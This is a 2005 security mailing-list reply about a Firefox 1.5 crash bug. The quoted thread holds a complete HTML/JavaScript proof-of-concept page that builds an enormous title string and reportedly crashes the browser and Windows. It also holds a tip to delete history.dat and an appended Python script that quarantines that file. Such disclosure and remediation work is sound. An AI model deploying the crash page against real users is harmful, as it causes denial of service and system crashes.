Message-ID: <18564343.1134233105027.JavaMail.juha-matti.laurio@netti.fi>
Date: Sat Dec 10 16:45:11 2005
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Subject: Firefox 1.5 buffer overflow (poc) - more
buffer
Thanks for sharing the profile location information to prevent a crash at
the next browser start.
In fact, this was covered at Internet Storm Center earlier on Friday morning:
http://isc.sans.org/diary.php?storyid=920
- Juha-Matti
(Time to shorten long replies..)
--clip--
>
> tip: only erasing \Documents and
> Settings\Administrador.COMP-NAME\Dados de
> aplicativos\Mozilla\Firefox\Profiles\history.dat
>
> your Firefox will start without crashing your machine (blue screen) every
> time you load it...
>
> t+
>
> 2005/12/9, Fósforo <fosforo@...il.com>:
> > It works here.
> >
> > Seems it depends on how much RAM you have. I got 2 blue screens after
> > changing the code a bit. The first one was about MEMORY_MANAGEMENT and
> > the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurred
> > without user interaction; for the second one I had just opened Firefox, not
> > the bug file (maybe cache?)
> >
> > PS: I have 1 GB of RAM
> >
> > <html><head><title>heh</title><script type="text/javascript">
> > function ex() {
> >   var buffer = "";
> >   for (var i = 0; i < 5000; i++) {
> >     buffer += "A";
> >   }
> >   var buffer2 = buffer;
> >   var buffer3 = buffer2;
> >   for (i = 0; i < 500; i++) {
> >     buffer2 += buffer;
> >     for (i = 0; i < 500; i++) {
> >       buffer3 += buffer2;
> >     }
> >   }
> >   document.title = buffer2;
> > }
> > </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> > </a></body></html>
> >
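
The quoted tip erases history.dat so that Firefox starts cleanly again. The added example below, which is not part of the original thread, renames the file in every profile under a given root instead of erasing it and records its size and SHA-256, so the copy remains available for analysis. The function name, the `.quarantine` suffix and the record fields are assumptions, and Firefox is assumed to be closed when it runs.

```python
import hashlib
import os
import sys


def quarantine_history(profiles_root, suffix=".quarantine"):
    """Rename every history.dat under profiles_root and return one record per file.

    For the browser, renaming has the same effect as the deletion suggested in
    the thread (no history.dat at the next start), but the file is preserved.
    """
    records = []
    for dirpath, _dirs, files in os.walk(profiles_root):
        if "history.dat" not in files:
            continue
        src = os.path.join(dirpath, "history.dat")

        # Hash before moving, so the record identifies exactly what was set aside.
        digest = hashlib.sha256()
        with open(src, "rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                digest.update(chunk)
        size = os.path.getsize(src)

        # Never overwrite a copy quarantined by an earlier run.
        dst = src + suffix
        n = 1
        while os.path.exists(dst):
            dst = f"{src}{suffix}.{n}"
            n += 1

        os.rename(src, dst)
        records.append({
            "profile": dirpath,
            "moved_to": dst,
            "bytes": size,
            "sha256": digest.hexdigest(),
        })
    return records


if __name__ == "__main__":
    # Usage (path is supplied by the operator): python quarantine.py <Profiles dir>
    for rec in quarantine_history(sys.argv[1]):
        print(rec)
```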